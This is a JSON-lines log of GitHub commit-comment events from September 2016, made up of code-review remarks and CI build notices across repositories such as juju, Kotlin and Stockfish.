{"id":"4567498099","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19034447,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-15T11:22:15Z","updated_at":"2016-09-15T11:22:15Z","body":"TeamCity test :: test [Build 14](http://ci.lemmew.com:8111/viewLog.html?buildId=1466&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:03"}},"created_at":"2016-09-15T11:22:15Z"}
{"id":"4567498761","type":"CommitCommentEvent","actor":{"login":"IGordynskyi"},"repo":{"name":"IGordynskyi/SAI"},"payload":{"comment":{"id":19034452,"position":null,"line":null,"path":null,"commit_id":"56a945e1aadc52ebc5273c44bf778e187636462f","created_at":"2016-09-15T11:22:26Z","updated_at":"2016-09-15T11:22:26Z","body":"In sai_thrift_create_virtual_router() fixed issue with passing Ipv4 attribute to Ipv6 function. We should pass vr_attribute2_value instead of vr_attribute1_value to enable V6 routing."}},"created_at":"2016-09-15T11:22:26Z"}
{"id":"4567499529","type":"CommitCommentEvent","actor":{"login":"nir-lavee"},"repo":{"name":"France-ioi/bebras-modules"},"payload":{"comment":{"id":19034454,"position":null,"line":null,"path":null,"commit_id":"8dc7e2251e1e5289ed8e4565f8e3dc39a3c9274c","created_at":"2016-09-15T11:22:38Z","updated_at":"2016-09-15T11:22:38Z","body":"Do I understand correctly that your intention is to preempt any grading that is currently running, forget that gradingTask, create another and start grading a new answer?\r\n\r\n1. Is this the desired behavior across all tasks that are graded with callbacks? E.g. python programming, etc.\r\n\r\n2. I think the current gradingTask must be properly destroyed first, via destroyTask(), otherwise there may be some undefined behavior (factories must be disposed, and unload must be called). Should I add this?"}},"created_at":"2016-09-15T11:22:38Z"}
{"id":"4567499677","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"bigmickeystyle/wk3"},"payload":{"comment":{"id":19034455,"position":27,"line":27,"path":"thursday2_JSON.js","commit_id":"77074bbc6c8cb344de5402a2c369a580e0aa2ad0","created_at":"2016-09-15T11:22:41Z","updated_at":"2016-09-15T11:22:41Z","body":"looks good to me!\r\ncompare this one with the other exercise: you are putting the call of the potentially error-throwing function (`JSON.parse` in this case) in a `try` block. "}},"created_at":"2016-09-15T11:22:41Z"}
{"id":"4567501369","type":"CommitCommentEvent","actor":{"login":"anatoliyarkhipov"},"repo":{"name":"cubekit/ioc"},"payload":{"comment":{"id":19034461,"position":null,"line":null,"path":null,"commit_id":"afd3db2cb02bec65ad13ce72f7ea1612847c7812","created_at":"2016-09-15T11:23:08Z","updated_at":"2016-09-15T11:23:08Z","body":"Good job, Anatoliy"}},"created_at":"2016-09-15T11:23:08Z"}
{"id":"4567502013","type":"CommitCommentEvent","actor":{"login":"Prachi2807"},"repo":{"name":"zeromq/libzmq"},"payload":{"comment":{"id":19034465,"position":null,"line":null,"path":null,"commit_id":"acb68070415691413ade304c2a75beeb69106909","created_at":"2016-09-15T11:23:17Z","updated_at":"2016-09-15T11:23:17Z","body":"zmq_connect with sourceip:port for Ipv6 is not working. I am using the format\r\n\r\n**zmq_connect(socket,\"tcp://[::ffff:127.0.0.1]:5552;[::ffff:127.0.0.1]:5558\");**\r\n\r\nBut this is not working, can u please tell why,"}},"created_at":"2016-09-15T11:23:17Z"}
{"id":"4567504911","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19034478,"position":87,"line":87,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/introduce/extractClass/ExtractSuperclassRefactoring.kt","commit_id":"c84ad60eb7dc3a06eb3ffe38304e5a68b8826622","created_at":"2016-09-15T11:24:02Z","updated_at":"2016-09-15T11:24:02Z","body":"You don't need `project` as a separate parameter; you can use `originalClass.project`"}},"created_at":"2016-09-15T11:24:02Z"}
{"id":"4567505238","type":"CommitCommentEvent","actor":{"login":"aapav01"},"repo":{"name":"CyanogenMod/android_device_samsung_zero-common"},"payload":{"comment":{"id":19034480,"position":null,"line":null,"path":null,"commit_id":"23041e00c589de77c809275d6c295632140c51e9","created_at":"2016-09-15T11:24:08Z","updated_at":"2016-09-15T11:24:08Z","body":"do camera work now ?\r\n"}},"created_at":"2016-09-15T11:24:08Z"}
{"id":"4567508018","type":"CommitCommentEvent","actor":{"login":"PawelGutkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19034488,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T11:24:46Z","updated_at":"2016-09-15T11:24:46Z","body":"@rkorytkowski I am working on printing logs, and build on my CI shows no errors, that's weird..."}},"created_at":"2016-09-15T11:24:46Z"}
{"id":"4567509664","type":"CommitCommentEvent","actor":{"login":"Wetxius"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19034493,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T11:25:13Z","updated_at":"2016-09-15T11:25:13Z","body":"Больше, просто за счет хранения таблицы в памяти, и чуть большим временем использования cpu для перебора этой таблицы. Но эти величины будут мизерные. В филгере, факт, что больше строк, да и конфиг автооткрытия итемов поболе."}},"created_at":"2016-09-15T11:25:13Z"}
{"id":"4567511117","type":"CommitCommentEvent","actor":{"login":"chris391"},"repo":{"name":"chris391/gittest"},"payload":{"comment":{"id":19034498,"position":5,"line":9,"path":"index.html","commit_id":"3ca7179317a7e53499254a29046c8a11e3d4a38a","created_at":"2016-09-15T11:25:33Z","updated_at":"2016-09-15T11:25:33Z","body":"what is this\r\n"}},"created_at":"2016-09-15T11:25:33Z"}
{"id":"4567515097","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19034505,"position":null,"line":null,"path":null,"commit_id":"9dbe450a1444e9fa9b9bbcaefa961753794121c2","created_at":"2016-09-15T11:26:32Z","updated_at":"2016-09-15T11:26:32Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/463/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T11:26:32Z"}
{"id":"4567516775","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19034513,"position":144,"line":144,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/introduce/extractClass/ExtractSuperclassRefactoring.kt","commit_id":"c84ad60eb7dc3a06eb3ffe38304e5a68b8826622","created_at":"2016-09-15T11:26:57Z","updated_at":"2016-09-15T11:26:57Z","body":"Why is the `isLocal` check neeed? How can we get a local variable in the list of members to move?"}},"created_at":"2016-09-15T11:26:57Z"}
{"id":"4567518067","type":"CommitCommentEvent","actor":{"login":"RunoFawkes"},"repo":{"name":"RunoFawkes/Source-Code-Inspection"},"payload":{"comment":{"id":19034519,"position":null,"line":null,"path":null,"commit_id":"54ff7951476be46f1e856eab15fb1687b7f5d913","created_at":"2016-09-15T11:27:18Z","updated_at":"2016-09-15T11:27:18Z","body":"Yay, this actually did it! Builds are now passing again :D "}},"created_at":"2016-09-15T11:27:18Z"}
{"id":"4567518782","type":"CommitCommentEvent","actor":{"login":"Shestak"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19034521,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T11:27:29Z","updated_at":"2016-09-15T11:27:29Z","body":"Ну, я вижу тут три варианта:\r\n1 - Оставить все так, как есть (я имею ввиду про старые дебаффы).\r\n2 - Удалить старые дебаффы и запостить их на форуме.\r\n3 - Вернуть все старые дебаффы в конфиг сборки."}},"created_at":"2016-09-15T11:27:29Z"}
{"id":"4567522820","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19034529,"position":null,"line":null,"path":null,"commit_id":"a00142df582842b30e0be202d6859a015379a7ca","created_at":"2016-09-15T11:28:29Z","updated_at":"2016-09-15T11:28:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1009](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13323&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T11:28:29Z"}
{"id":"4567523798","type":"CommitCommentEvent","actor":{"login":"ryanbr"},"repo":{"name":"HatScripts/Prebake"},"payload":{"comment":{"id":19034533,"position":null,"line":null,"path":null,"commit_id":"38cdb0fae3b817495d153cdc262d6095f25eb673","created_at":"2016-09-15T11:28:44Z","updated_at":"2016-09-15T11:28:44Z","body":"Added, thanks!\r\n\r\nhttps://github.com/ryanbr/fanboy-adblock/commit/cab06cc133e55659de4a6e9883024fa4ead355ef"}},"created_at":"2016-09-15T11:28:44Z"}
{"id":"4567526055","type":"CommitCommentEvent","actor":{"login":"koivo"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19034538,"position":null,"line":null,"path":null,"commit_id":"129f3be3e4220c43219e3e6e0ae76c753c7324b7","created_at":"2016-09-15T11:29:19Z","updated_at":"2016-09-15T11:29:19Z","body":"Do we need also change \r\nPREFERRED_VERSION_python-native ?= \"2.7.11\"\r\nto\r\nPREFERRED_VERSION_python-native ?= \"2.7.12\"\r\n?"}},"created_at":"2016-09-15T11:29:19Z"}
{"id":"4567528040","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19034544,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T11:29:48Z","updated_at":"2016-09-15T11:29:48Z","body":"Does he have to pay the fine directly to you? :p"}},"created_at":"2016-09-15T11:29:48Z"}
{"id":"4567531514","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19034552,"position":null,"line":null,"path":null,"commit_id":"129f3be3e4220c43219e3e6e0ae76c753c7324b7","created_at":"2016-09-15T11:30:40Z","updated_at":"2016-09-15T11:30:40Z","body":"Nope, you even can't (No recipe for python-native 2.7.12).\r\nJust python ?= \"2.7.12\r\n"}},"created_at":"2016-09-15T11:30:40Z"}
{"id":"4567532557","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034558,"position":6,"line":68,"path":"cloudconfig/containerinit/container_userdata.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:30:54Z","updated_at":"2016-09-15T11:30:54Z","body":"This is not a cloud-init template. It's a LXD template. The wording doesn't quite flow in the description."}},"created_at":"2016-09-15T11:30:54Z"}
{"id":"4567533767","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19034563,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T11:31:12Z","updated_at":"2016-09-15T11:31:12Z","body":"What do you mean by your CI?"}},"created_at":"2016-09-15T11:31:12Z"}
{"id":"4567535311","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034567,"position":16,"line":78,"path":"cloudconfig/containerinit/container_userdata.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:31:35Z","updated_at":"2016-09-15T11:31:35Z","body":"Typo on template."}},"created_at":"2016-09-15T11:31:35Z"}
{"id":"4567536663","type":"CommitCommentEvent","actor":{"login":"kyriakoy"},"repo":{"name":"604media/SuiteCRM"},"payload":{"comment":{"id":19034571,"position":null,"line":null,"path":null,"commit_id":"b244f614886c22899625285c42a844b469f32a77","created_at":"2016-09-15T11:31:56Z","updated_at":"2016-09-15T11:31:56Z","body":"Please add it to master comit. This isn't included at the 7.7.4\r\n"}},"created_at":"2016-09-15T11:31:56Z"}
{"id":"4567537715","type":"CommitCommentEvent","actor":{"login":"ifokkema"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":19034575,"position":13,"line":39,"path":"src/class/objects.php","commit_id":"c46eda4736075e6766adaa264c518909daefc1f2","created_at":"2016-09-15T11:32:13Z","updated_at":"2016-09-15T11:32:13Z","body":"This includes the file in pretty much every page load in LOVD. Shall we check which functions are really used that often and put them in a more general place, like in `inc-lib-init.php` or perhaps as a method in `LOVD_Object` itself?"}},"created_at":"2016-09-15T11:32:13Z"}
{"id":"4567538034","type":"CommitCommentEvent","actor":{"login":"mihkels"},"repo":{"name":"open-eid/SiVa"},"payload":{"comment":{"id":19034577,"position":3,"line":3,"path":"validation-services-parent/validation-commons/src/main/java/ee/openeid/siva/validation/service/signature/policy/CannotLoadPolicyReferencedByDefaultPolicyException.java","commit_id":"06e614e7e78862ed552f7a1a27aee0f936c85b3f","created_at":"2016-09-15T11:32:17Z","updated_at":"2016-09-15T11:32:17Z","body":"Maybe CannotLoadDefaultPolicyException is enough for class name and message can give more exact description of the problem we have"}},"created_at":"2016-09-15T11:32:17Z"}
{"id":"4567543994","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034595,"position":7,"line":69,"path":"cloudconfig/containerinit/container_userdata.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:33:47Z","updated_at":"2016-09-15T11:33:47Z","body":"We should rename these functions, based on what they will now do:\r\n\r\n- GenerateNetworkConfigV1\r\n- GenerateEtcNetworkInterfaces\r\n\r\nas that makes it more obvious what they will do."}},"created_at":"2016-09-15T11:33:47Z"}
{"id":"4567548410","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034603,"position":99,"line":161,"path":"cloudconfig/containerinit/container_userdata.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:34:51Z","updated_at":"2016-09-15T11:34:51Z","body":"Does ```generatedTemplate``` always have a trailing new-line?"}},"created_at":"2016-09-15T11:34:51Z"}
{"id":"4567548928","type":"CommitCommentEvent","actor":{"login":"koivo"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19034606,"position":null,"line":null,"path":null,"commit_id":"129f3be3e4220c43219e3e6e0ae76c753c7324b7","created_at":"2016-09-15T11:34:58Z","updated_at":"2016-09-15T11:34:58Z","body":"Ok thanks."}},"created_at":"2016-09-15T11:34:58Z"}
{"id":"4567550405","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034609,"position":128,"line":318,"path":"cloudconfig/containerinit/container_userdata.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:35:21Z","updated_at":"2016-09-15T11:35:21Z","body":"I don't believe this is necessary anymore. Though we should check to see what KVM does."}},"created_at":"2016-09-15T11:35:21Z"}
{"id":"4567551756","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19034616,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-15T11:35:41Z","updated_at":"2016-09-15T11:35:41Z","body":"@mcostalba But Stephane claimed this version to be faster, see comments on the first [commit](https://github.com/official-stockfish/Stockfish/commit/402bb47126391571944bcf3209365feac99d54a6)"}},"created_at":"2016-09-15T11:35:41Z"}
{"id":"4567552298","type":"CommitCommentEvent","actor":{"login":"istimaldar"},"repo":{"name":"turok-m-a/multiplayer_snake"},"payload":{"comment":{"id":19034617,"position":null,"line":null,"path":null,"commit_id":"94811bc842d2de663225c3ebcd206bd19739255f","created_at":"2016-09-15T11:35:50Z","updated_at":"2016-09-15T11:35:50Z","body":"Можно добавить различные бонусы для змейки и еды. Например, ускорение или замедление."}},"created_at":"2016-09-15T11:35:50Z"}
{"id":"4567553187","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034620,"position":22,"line":157,"path":"container/lxd/lxd.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:36:03Z","updated_at":"2016-09-15T11:36:03Z","body":"not rely ON DHCP."}},"created_at":"2016-09-15T11:36:03Z"}
{"id":"4567556897","type":"CommitCommentEvent","actor":{"login":"raluca-san"},"repo":{"name":"raluca-san/raphael-sketchpad"},"payload":{"comment":{"id":19034633,"position":null,"line":null,"path":null,"commit_id":"6cbcd4c7f3f2b3e575f7937b4ed93dcebf68c0d2","created_at":"2016-09-15T11:37:03Z","updated_at":"2016-09-15T11:37:03Z","body":"Fiddle: https://jsfiddle.net/1ct0xb4r/15/"}},"created_at":"2016-09-15T11:37:03Z"}
{"id":"4567558379","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034642,"position":23,"line":158,"path":"container/lxd/lxd.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:37:27Z","updated_at":"2016-09-15T11:37:27Z","body":"Can we explain the problem a little better? \r\n\r\nNot all network segments will  have DHCP running on what is the eth0 subnet so we cannot use DHCP as a default configuration. (Or something better. :))"}},"created_at":"2016-09-15T11:37:27Z"}
{"id":"4567559112","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034643,"position":24,"line":159,"path":"container/lxd/lxd.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:37:37Z","updated_at":"2016-09-15T11:37:37Z","body":"Capitalise ENI."}},"created_at":"2016-09-15T11:37:37Z"}
{"id":"4567559364","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"DiTheGrey/java_pft"},"payload":{"comment":{"id":19034644,"position":19,"line":19,"path":"sandbox/src/main/java/ru/stqa/pft/lesson1/Point.java","commit_id":"d17057a18205a488685f05d4b4df11ad9833c7df","created_at":"2016-09-15T11:37:41Z","updated_at":"2016-09-15T11:37:41Z","body":"public static double distance(Point p2) {\r\n    return Math.sqrt(Math.pow(p2.x - this.x, 2) + Math.pow(p2.y - this.y, 2));\r\n}"}},"created_at":"2016-09-15T11:37:41Z"}
{"id":"4567560484","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034648,"position":26,"line":161,"path":"container/lxd/lxd.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:37:59Z","updated_at":"2016-09-15T11:37:59Z","body":"Not sure I understand this comment."}},"created_at":"2016-09-15T11:37:59Z"}
{"id":"4567562674","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034653,"position":34,"line":169,"path":"container/lxd/lxd.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:38:32Z","updated_at":"2016-09-15T11:38:32Z","body":"Create the \"network configuration\", not cloud-int cfg."}},"created_at":"2016-09-15T11:38:32Z"}
{"id":"4567563503","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19034655,"position":218,"line":218,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/introduce/extractClass/ExtractSuperclassRefactoring.kt","commit_id":"c84ad60eb7dc3a06eb3ffe38304e5a68b8826622","created_at":"2016-09-15T11:38:44Z","updated_at":"2016-09-15T11:38:44Z","body":"I think that for Kotlin this needs to be tracked explicitly, not calculated from the directory. We don't always have Java's matching package/directory structure."}},"created_at":"2016-09-15T11:38:44Z"}
{"id":"4567564643","type":"CommitCommentEvent","actor":{"login":"Narretz"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19034659,"position":null,"line":null,"path":null,"commit_id":"1547c751aa48efe7dbefef701c3df5983b04aa2e","created_at":"2016-09-15T11:39:01Z","updated_at":"2016-09-15T11:39:01Z","body":"As \"refactor\" it won't show up in the changelog, so we have to manually add it when generating"}},"created_at":"2016-09-15T11:39:01Z"}
{"id":"4567564717","type":"CommitCommentEvent","actor":{"login":"jvandijk"},"repo":{"name":"Sensimity/com.sensimity.ti.client"},"payload":{"comment":{"id":19034660,"position":null,"line":null,"path":null,"commit_id":"6a98be7dd072864a5a29f2c146c65f1989ac7a17","created_at":"2016-09-15T11:39:05Z","updated_at":"2016-09-15T11:39:05Z","body":"Agreed.... oversaw the name to osname change!"}},"created_at":"2016-09-15T11:39:05Z"}
{"id":"4567564772","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19034661,"position":null,"line":null,"path":null,"commit_id":"ad8e28c8cf2b447b726896e27f77596e9e4d3aeb","created_at":"2016-09-15T11:39:06Z","updated_at":"2016-09-15T11:39:06Z","body":"Your site is not blank. Your apache dont display errors.\r\n\r\nHave first line maincore.php in your site.\r\n````\r\nini_set ('display_errors', 1);\r\n````"}},"created_at":"2016-09-15T11:39:06Z"}
{"id":"4567565446","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034662,"position":47,"line":182,"path":"container/lxd/lxd.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:39:16Z","updated_at":"2016-09-15T11:39:16Z","body":"Why has it tried to retrieve /etc/network/interfaces? I don't understand \"get\" here."}},"created_at":"2016-09-15T11:39:16Z"}
{"id":"4567567770","type":"CommitCommentEvent","actor":{"login":"maelick"},"repo":{"name":"maelick/deps-analysis"},"payload":{"comment":{"id":19034671,"position":null,"line":null,"path":null,"commit_id":"8f93b91295d9936d4c02a80fa57e857f10e721ff","created_at":"2016-09-15T11:39:53Z","updated_at":"2016-09-15T11:39:53Z","body":"Taille des paquets ajoutée"}},"created_at":"2016-09-15T11:39:53Z"}
{"id":"4567570128","type":"CommitCommentEvent","actor":{"login":"pehbeh"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19034676,"position":14,"line":2933,"path":"wcfsetup/install/lang/de.xml","commit_id":"fce4f2b23f1962afb6514b291b418a96f3e98c4a","created_at":"2016-09-15T11:40:28Z","updated_at":"2016-09-15T11:40:28Z","body":"\"Willst du dich sich...\" !?"}},"created_at":"2016-09-15T11:40:28Z"}
{"id":"4567570555","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Igarenya/java_for_QA"},"payload":{"comment":{"id":19034679,"position":7,"line":18,"path":"sandbox/src/main/java/ru/stqa/pft/sandbox/Point.java","commit_id":"bbc18c7945e7a00b74de0a6aac4e59fbce0fe5e3","created_at":"2016-09-15T11:40:33Z","updated_at":"2016-09-15T11:40:33Z","body":"+  public static double distance(Point p2) {\r\n +    return Math.sqrt(Math.pow(this.a - p2.a, 2) + Math.pow(this.b - p2.b, 2));\r\n +  }"}},"created_at":"2016-09-15T11:40:33Z"}
{"id":"4567570768","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034680,"position":57,"line":192,"path":"container/lxd/lxd.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:40:36Z","updated_at":"2016-09-15T11:40:36Z","body":"Again, not sure I understand the reference to \"get\" and the path. Why is it dealing with \"/var/lib/cloud/\"?"}},"created_at":"2016-09-15T11:40:36Z"}
{"id":"4567572370","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19034684,"position":null,"line":null,"path":null,"commit_id":"a00142df582842b30e0be202d6859a015379a7ca","created_at":"2016-09-15T11:41:01Z","updated_at":"2016-09-15T11:41:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1009](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13323&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:12:31"}},"created_at":"2016-09-15T11:41:01Z"}
{"id":"4567572606","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034686,"position":12,"line":23,"path":"tools/lxdclient/client_instance.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:41:05Z","updated_at":"2016-09-15T11:41:05Z","body":"Readability: New line after 'type Devices'."}},"created_at":"2016-09-15T11:41:05Z"}
{"id":"4567576189","type":"CommitCommentEvent","actor":{"login":"nathangibson"},"repo":{"name":"srophe/srophe-eXist-app"},"payload":{"comment":{"id":19034698,"position":null,"line":null,"path":null,"commit_id":"45d038cd598e70374030a251bc5b506cdbf05ad7","created_at":"2016-09-15T11:42:02Z","updated_at":"2016-09-15T11:42:02Z","body":"@wsalesky I would like to push this typo correction to the master branch, but I will leave that to you if that's OK since I don't want to mess up the correct procedure.\r\ncc: @davidamichelson "}},"created_at":"2016-09-15T11:42:02Z"}
{"id":"4567576686","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034699,"position":26,"line":100,"path":"tools/lxdclient/client_instance.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:42:10Z","updated_at":"2016-09-15T11:42:10Z","body":"Not sure the \"/\" is harmless. We should use:\r\n\r\n    https://golang.org/pkg/path/filepath/#Join"}},"created_at":"2016-09-15T11:42:10Z"}
{"id":"4567579295","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034703,"position":30,"line":104,"path":"tools/lxdclient/client_instance.go","commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:42:45Z","updated_at":"2016-09-15T11:42:45Z","body":"Use %q for paths."}},"created_at":"2016-09-15T11:42:45Z"}
{"id":"4567580796","type":"CommitCommentEvent","actor":{"login":"frobware"},"repo":{"name":"juju/juju"},"payload":{"comment":{"id":19034713,"position":null,"line":null,"path":null,"commit_id":"6bc619005c72187b6039b0e8bc3872be41cfd090","created_at":"2016-09-15T11:43:10Z","updated_at":"2016-09-15T11:43:10Z","body":"These are not cloud-init templates. These are LXD templates."}},"created_at":"2016-09-15T11:43:10Z"}
{"id":"4567581016","type":"CommitCommentEvent","actor":{"login":"retronym"},"repo":{"name":"ktoso/sbt-jmh"},"payload":{"comment":{"id":19034715,"position":5,"line":120,"path":"build.sbt","commit_id":"df811e20ce1affe104c5449b9c267cf93160478b","created_at":"2016-09-15T11:43:13Z","updated_at":"2016-09-15T11:43:13Z","body":"You also need to change:\r\n\r\n```\r\n\"pl.project13.scala\" %% \"sbt-jmh-extras\"           % extrasV, // Apache v2\r\n```\r\n\r\nto:\r\n\r\n```\r\n\"pl.project13.scala\" %% \"sbt-jmh-extras\"           % extrasV, // Apache v2\r\n```\r\n\r\nBefore you cut another release:\r\n\r\n```diff\r\nextras/src/main/java/pl/project13/scala/jmh/extras/profiler/FlightRecordingProfiler.java\r\n+++ extras/src/main/java/pl/project13/scala/jmh/extras/profiler/FlightRecordingProfiler.java\t(revision )\r\n@@ -70,10 +70,6 @@\r\n \r\n   @Override\r\n   public Collection<String> addJVMOptions(BenchmarkParams params) {\r\n-\r\n-    startFlightRecordingOptions += \"filename=\" + jfrData;\r\n-    flightRecorderOptions += \"settings=\" + params.getJvm().replace(\"bin/java\", \"lib/jfr/profile.jfc\");\r\n-\r\n     return Arrays.asList(\r\n       \"-XX:+UnlockCommercialFeatures\",\r\n       \"-XX:+FlightRecorder\",\r\n```"}},"created_at":"2016-09-15T11:43:13Z"}
{"id":"4567582158","type":"CommitCommentEvent","actor":{"login":"maximilianhuber"},"repo":{"name":"fossology/fossology"},"payload":{"comment":{"id":19034722,"position":6,"line":10,"path":"install/db/dbcreate.in","commit_id":"17254b98da95a8448b3e541c974e119b5558b139","created_at":"2016-09-15T11:43:30Z","updated_at":"2016-09-15T11:43:30Z","body":"Question is answered by https://github.com/fossology/fossology/pull/697#issuecomment-247305754"}},"created_at":"2016-09-15T11:43:30Z"}
{"id":"4567583744","type":"CommitCommentEvent","actor":{"login":"turok-m-a"},"repo":{"name":"istimaldar/EncryptProgram"},"payload":{"comment":{"id":19034729,"position":null,"line":null,"path":null,"commit_id":"3c00a3686646eca6ca80de2b71431977ced4fd5d","created_at":"2016-09-15T11:43:56Z","updated_at":"2016-09-15T11:43:56Z","body":"Можно добавить генератор надежных (>= 20 символов) паролей."}},"created_at":"2016-09-15T11:43:56Z"}
{"id":"4567584593","type":"CommitCommentEvent","actor":{"login":"sttts"},"repo":{"name":"Mirantis/k8s-devbox"},"payload":{"comment":{"id":19034730,"position":133,"line":121,"path":"provisioning/files/k8s-devenv.sh","commit_id":"6a881c8b3310205f309a3d26e4198e9a63f5f7d5","created_at":"2016-09-15T11:44:09Z","updated_at":"2016-09-15T11:44:09Z","body":"Merged."}},"created_at":"2016-09-15T11:44:09Z"}
